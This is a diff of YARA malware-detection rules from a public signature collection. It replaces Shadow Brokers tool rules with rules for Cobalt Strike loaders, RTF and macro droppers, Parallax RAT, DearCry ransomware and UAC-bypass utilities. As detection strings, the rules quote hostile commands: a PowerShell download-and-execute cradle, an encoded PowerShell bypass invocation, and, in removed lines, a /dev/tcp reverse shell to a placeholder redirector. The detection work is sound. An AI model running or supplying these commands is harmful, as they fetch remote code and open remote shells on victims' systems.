+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt19.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2f4dd668c59244e92ebfe0e2fc2859b2376cf1dd6fc6522e8f452787aa96365f"
+		logic_hash = "4b1ec0fc6c0ad4e76c526f7568153bca62f9bffdd38a3b1eaa51a37a1dcab226"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4130284727ddef4610d63bfa8330cdafcb6524d3d2e7e8e0cb34fde8864c8118"
+		hash1 = "e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9"
 
 	strings:
-		$x2 = "### Local exploit for" fullword ascii
+		$x1 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$x2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+		$s1 = "Could not open process token: %d (%u)" fullword ascii
+		$s2 = "0fd00b.dll" fullword ascii
+		$s3 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+		$s4 = "Could not connect to pipe (%s): %d" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_README_Cup
+rule SIGNATURE_BASE_FE_LEGALSTRIKE_MACRO
 {
 	meta:
-		description = "Auto-generated rule - file README.cup.NOPEN"
-		author = "Florian Roth (Nextron Systems)"
-		id = "876f3d99-cc6d-568a-a202-1b4938436303"
-		date = "2016-12-17"
+		description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
+		author = "Ian.Ahl@fireeye.com @TekDefense - modified by Florian Roth"
+		id = "eb15e5aa-16e5-5c07-a293-ad15c0c09d8e"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L290-L304"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt19.yar#L34-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bd05a23ce29be88c1a459358c984e1317cf56d21e5b378624af644fb2b41931d"
+		logic_hash = "b38edeedcc02168d3ba7e82c3f5c6963ffc8ce1688eeb424ce686484f3687512"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "98aaad31663b89120eb781b25d6f061037aecaeb20cf5e32c36c68f34807e271"
+		version = ".1"
+		filetype = "MACRO"
 
 	strings:
-		$s3 = "-F file(s)   Full path to target's \"fuser\" program." fullword ascii
-		$s4 = "done after the RAT is killed." fullword ascii
+		$ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
+		$wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
+		$wsobj2 = "Obj.Run " ascii wide
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Nopen_Oneshot
+rule SIGNATURE_BASE_FE_LEGALSTRIKE_RTF : FILE
 {
 	meta:
-		description = "Auto-generated rule - file oneshot.example"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6a6b5426-f559-5668-a2ed-982801933302"
-		date = "2016-12-17"
+		description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
+		author = "joshua.kim@FireEye. - modified by Florian Roth"
+		id = "b62ceffa-445f-517e-b86b-56e47876c6c0"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L306-L319"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt19.yar#L52-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "19aa32aafaaccc6697bbaff642d996554eccf2261d23071cfb8599ea0eea628b"
+		logic_hash = "af811694076f7d53ee76713538839c4ec82c591518d59d5988dcb893bfd32ffe"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a85b260d6a53ceec63ad5f09e1308b158da31062047dc0e4d562d2683a82bf9a"
+		tags = "FILE"
+		version = ".1"
+		filetype = "MACRO"
 
 	strings:
-		$s1 = "/sbin/sh -c (mkdir /tmp/.X11R6; cd /tmp/.X11R6 && telnet" ascii
+		$lnkinfo = "4c0069006e006b0049006e0066006f"
+		$encoded1 = "4f4c45324c696e6b"
+		$encoded2 = "52006f006f007400200045006e007400720079"
+		$encoded3 = "4f0062006a0049006e0066006f"
+		$encoded4 = "4f006c0065"
+		$datastore = "\\*\\datastore"
 
 	condition:
-		1 of them
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Earlyshovel
+rule SIGNATURE_BASE_SUSP_RAR_Single_Doc_File : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.earlyshovel.COMMON"
+		description = "Detects suspicious RAR files that contain nothing but a single .doc file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2640f9f-8934-5095-9c30-f24941685c9e"
-		date = "2016-12-17"
+		id = "92dc3a5d-d12c-56d3-8531-25b3da1e1595"
+		date = "2020-07-11"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L321-L334"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hunting_susp_rar.yar#L3-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "396810b439ac53f393ad37a8acbd7236f8325730c75c1a6339e4c6343ecade7a"
+		logic_hash = "bfc8c60c86e65e041976dac9d15c486ad99da930849bd697c869eec0a2626c38"
+		score = 40
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$s1 = ".doc"
+
+	condition:
+		uint16( 0 ) == 0x6152 and filesize < 4000KB and $s1 at ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) - 9 ) and ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) + uint32( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 7 ) > filesize -8 )
+}
+rule SIGNATURE_BASE_Crime_Win32_Parallax_Loader_1 : FILE
+{
+	meta:
+		description = "Detects Parallax Loader"
+		author = "@VK_Intel"
+		id = "5e030b68-3c29-5203-bb4e-f01850bfbbab"
+		date = "2020-02-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_parallax_rat.yar#L2-L18"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "1331e7b69fd9b14b5d2dae45b452b385e48018290d91de33a4f4a5ebcce4805b"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "504e7a376c21ffbfb375353c5451dc69a35a10d7e2a5d0358f9ce2df34edf256"
+		tags = "FILE"
+		hash1 = "829fce14ac8b9ad293076c16a1750502c6b303123c9bd0fb17c1772330577d65"
 
 	strings:
-		$x1 = "--tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT" ascii
+		$main_call = { 68 81 85 50 00 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 51 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 00 10 00 00 68 b0 a2 00 00 ff ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 8c e1 4f 00 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 0c 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 40 84 50 00 8d ?? ?? ?? ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c}
+		$decoder_call = { 55 8b ec 83 c4 f8 33 c0 89 ?? ?? 33 d2 89 ?? ?? 8b ?? ?? 3b ?? ?? 7d ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 33 ?? ?? ?? ?? ?? ?? 8b ?? ?? 8b ?? ?? 89 ?? ?? 83 ?? ?? ?? 75 ?? 33 d2 89 ?? ?? eb ?? ff ?? ?? ff ?? ?? 8b ?? ?? 3b ?? ?? 7c ?? 59 59 5d c3}
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Envisioncollision
+rule SIGNATURE_BASE_Crime_Win32_Parallax_Payload_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.envisioncollision.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a738e270-a3ea-5d38-8933-797d1bd9036a"
-		date = "2016-12-17"
+		description = "Detects Parallax Injected Payload v1.01"
+		author = "@VK_Intel"
+		id = "f3a23a28-e322-59ff-85e0-72e44def5c02"
+		date = "2020-02-24"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L336-L352"
+		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_parallax_rat.yar#L20-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "36b2a20ef3a6540a686d7f52c8c885842fd84ba7c7daa74c21e241e25826030e"
+		logic_hash = "3a1718d7caea5bd6741dd39fc16f955e1d3c73a282d51eda5b63c3352404529e"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f04f078a8f0fdfc864d3d2e37d123f55ecc1d5e401a87eccd0c3846770f9e02"
+		tags = "FILE"
+		hash1 = "20d0be64a0e0c2e96729143d41b334603f5d3af3838a458b0627af390ae33fbc"
 
 	strings:
-		$x1 = "-i<IP> -p<port> -U<user> -P<password> -D<directory> -c<commands>" fullword ascii
-		$x2 = "sh</dev/tcp/REDIR_IP/SHELL_PORT>&0" fullword ascii
-		$x3 = "-n ENVISIONCOLLISION" ascii
-		$x4 = "-UADMIN -PPASSWORD -i127.0.0.1 -Dipboard" fullword ascii
+		$zwdelay_prologue = { 66 ?? ?? ?? 66 83 c1 01 66 ?? ?? ?? 50 b8 cb cb cb cb 89 ?? ?? ?? ?? ?? 58 8b ?? ?? ?? ?? ?? 89 ?? ?? 68 88 13 00 00 8b ?? ?? 8b ?? ?? 51 e8 ?? ?? ?? ??}
+		$wininet_call = { b8 77 00 00 00 66 ?? ?? ?? b9 69 00 00 00 66 ?? ?? ?? ba 6e 00 00 00 66 ?? ?? ?? b8 69 00 00 00 66 ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ba 65 00 00 00 66 ?? ?? ?? b8 74 00 00 00 66 ?? ?? ?? 33 c9 66 ?? ?? ?? 8d ?? ?? 52 8b ?? ?? 8b ?? ?? ff d1 89 ?? ?? 6a 00 68 0c fc e5 f2 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 3d a8 16 da 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 e0 05 65 01 8b ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 f5 98 c0 6c 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 24 1d 19 e5 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 a8 ed f2 ce 8b ?? ?? 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 6a 00 ff ?? ?? 85 c0 75 ?? 68 88 13 00 00 ff ?? ?? eb ?? 6a 00 68 00 01 00 04 6a }
+		$rand_png_call = { b8 25 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 78 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 2e 00 00 00 66 ?? ?? ?? ?? ?? ?? b8 70 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 67 00 00 00 66 ?? ?? ?? ?? ?? ?? 33 c0 66 ?? ?? ?? ?? ?? ?? 6a 64 6a 40 8b ?? ?? 8b ?? ?? ff d2 89 ?? ?? 8b ?? ?? 50 68 00 e1 f5 05 68 10 27 00 00 e8 ?? ?? ?? ??}
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme1
+rule SIGNATURE_BASE_MAL_RANSOM_Crime_Dearcry_Mar2021_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1f5e3ab1-e0d1-589e-8c18-60c4ad07ee6e"
-		date = "2016-12-17"
+		description = "Triggers on strings of known DearCry samples"
+		author = "Nils Kuhnert"
+		id = "d9714502-f1ea-5fe8-b0ac-1f7a9a30d8f5"
+		date = "2021-03-12"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L356-L372"
+		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dearcry_ransom.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "171d3df191e5c9ae4a4afc3a878cc25548238046b8c4c52dbb9ca4431aae45b0"
+		logic_hash = "e55507475888087c84f9624f82516e8a40aaf59bf2fbea72129a1dd134b28110"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
-		hash2 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
-		hash3 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
+		tags = "FILE"
+		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
+		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
+		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
 
 	strings:
-		$x1 = "ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10" fullword ascii
+		$x1 = ".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG .PL .PY .DWG .XML .JPG .BMP .PNG .EXE .DLL .CAD .AVI .H.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA .GPG .EDB .MFS" ascii
+		$s1 = "create rsa error" ascii fullword
+		$s2 = "DEARCRY!" ascii fullword
+		$s4 = "/readme.txt" ascii fullword
+		$s5 = "msupdate" ascii fullword
+		$s6 = "Your file has been encrypted!" ascii fullword
+		$s7 = "%c:\\%s" ascii fullword
+		$s8 = "C:\\Users\\john\\" ascii
+		$s9 = "EncryptFile.exe.pdb" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize > 1MB and filesize < 2MB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme2
+rule SIGNATURE_BASE_MAL_CRIME_RANSOM_Dearcry_Mar21_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files user.tool.orleansstride.COMMON, user.tool.curserazor.COMMON"
+		description = "Detects DearCry Ransomware affecting Exchange servers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5959d881-2989-582c-abe2-48c76ce0e995"
-		date = "2016-12-17"
+		id = "96cd2fe8-8bb9-5a3b-9bf1-c63a1148a817"
+		date = "2021-03-12"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L374-L389"
+		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dearcry_ransom.yar#L29-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb68c415d64d1db3d4bb0f4ad994bd050cb2287e4dc7b3ac57549f818a7914d8"
+		logic_hash = "c4af7c29e917078f8658aca68ec95f8a03934f42c81fdd421639437e24f304bc"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
-		hash2 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
+		tags = "FILE"
+		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
+		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
+		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
 
 	strings:
-		$x1 = "#####  Upload the encrypted phone list as awk, modify each parser command to have the" fullword ascii
+		$s1 = "dear!!!" ascii fullword
+		$s2 = "EncryptFile.exe.pdb" ascii fullword
+		$s3 = "/readme.txt" ascii fullword
+		$s4 = "C:\\Users\\john\\" ascii
+		$s5 = "And please send me the following hash!" ascii fullword
+		$op1 = { 68 e0 30 52 00 6a 41 68 a5 00 00 00 6a 22 e8 81 d0 f8 ff 83 c4 14 33 c0 5e }
+		$op2 = { 68 78 6a 50 00 6a 65 6a 74 6a 10 e8 d9 20 fd ff 83 c4 14 33 c0 5e }
+		$op3 = { 31 40 00 13 31 40 00 a4 31 40 00 41 32 40 00 5f 33 40 00 e5 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them or 5 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme3
+rule SIGNATURE_BASE_Win7Elevatev2 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects Win7Elevate - Windows UAC bypass utility"
 		author = "Florian Roth (Nextron Systems)"
-		id = "41cfbf66-fb7d-5815-939f-06b23dfae746"
-		date = "2016-12-17"
+		id = "af092d16-ca95-5985-822a-50457c9cbcc9"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L391-L411"
+		reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "968ec80f26750ac734ad9e296b5afb35867f6c53de1e88f7c8af78daeac24b61"
-		score = 75
+		logic_hash = "2f5859388c6074f1a75f0c40387f30ffa50d6b87f20f518fd1af7398c95cd650"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
-		hash2 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
-		hash3 = "3fe78949a9f3068db953b475177bcad3c76d16169469afd72791b4312f60cfb3"
-		hash4 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
-		hash5 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
-		hash6 = "89748906d1c574a75fe030645c7572d7d4145b143025aa74c9b5e2be69df8773"
-		hash7 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
+		hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29"
+		hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1"
 
 	strings:
-		$s3 = ":%s/CRYPTKEY/CRYPTKEY/g" fullword ascii
+		$x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide
+		$x2 = "Win7ElevateV2\\x64\\Release\\" ascii
+		$x3 = "Run the command normally (without code injection)" wide
+		$x4 = "Inject file copy && elevate command" fullword wide
+		$x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" fullword wide
+		$x6 = "For injection, pick any unelevated Windows process with ASLR on:" fullword wide
+		$s1 = "\\cmd.exe" wide
+		$s2 = "runas" wide
+		$s3 = "explorer.exe" wide
+		$s4 = "Couldn't load kernel32.dll" wide
+		$s5 = "CRYPTBASE.dll" wide
+		$s6 = "shell32.dll" wide
+		$s7 = "ShellExecuteEx" ascii
+		$s8 = "COMCTL32.dll" ascii
+		$s9 = "ShellExecuteEx" ascii
+		$s10 = "HeapAlloc" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme4
+rule SIGNATURE_BASE_UACME_Akagi
 {
 	meta:
-		description = "Auto-generated rule - from files violetspirit.README, violetspirit.README"
+		description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9e84e4ab-f74a-59e5-aee2-408a68cd673f"
-		date = "2016-12-17"
+		id = "7979129e-99a3-522a-8285-9061e1e2bd41"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L413-L429"
+		reference = "https://github.com/hfiref0x/UACME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L35-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c19c77d7e7e26e01a9a50fd67cc0a7fd05069def878bf18726c3e115df307cb2"
-		score = 75
+		logic_hash = "e10f39837a53dcc6d301d21a69fca965aeca0a07cfc832a9a0142b08d280f955"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
-		hash2 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
+		hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
+		hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
 
 	strings:
-		$s1 = "[-v rpc version] : default 4 : Solaris 8 and other patched versions use version 5" fullword ascii
-		$s5 = "[-n tcp_port]    : default use portmapper to determine" fullword ascii
+		$x1 = "UACMe injected, Fubuki at your service." wide fullword
+		$x3 = "%temp%\\Hibiki.dll" fullword wide
+		$x4 = "[UCM] Cannot write to the target process memory." fullword wide
+		$s1 = "%systemroot%\\system32\\cmd.exe" wide
+		$s2 = "D:(A;;GA;;;WD)" wide
+		$s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide
+		$s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide
+		$s5 = "Fubuki.dll" ascii fullword
+		$l1 = "ntdll.dll" ascii
+		$l2 = "Cabinet.dll" ascii
+		$l3 = "GetProcessHeap" ascii
+		$l4 = "WriteProcessMemory" ascii
+		$l5 = "ShellExecuteEx" ascii
 
 	condition:
-		1 of them
+		(1 of ( $x* ) ) or ( 3 of ( $s* ) and all of ( $l* ) )
 }
-rule SIGNATURE_BASE_Emdivi_SFX : FILE
+rule SIGNATURE_BASE_Uacelevator : FILE
 {
 	meta:
-		description = "Detects Emdivi malware in SFX Archive"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "51367190-2e8d-507c-a19f-996bc6960977"
-		date = "2015-08-20"
+		description = "UACElevator bypassing UAC - file UACElevator.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "629b1a92-726d-5713-ae3d-74cc8a1e52ad"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L9-L28"
+		reference = "https://github.com/MalwareTech/UACElevator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L66-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3257983c64c52f36b04e3fe7b12180a37531338349137d4df00fc6f704557b2e"
-		score = 70
+		hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6"
+		logic_hash = "8215746b2c84a5500221580969fb2eac8ee11cbb5af4ba5bf2dbd1def65b8745"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
-		hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
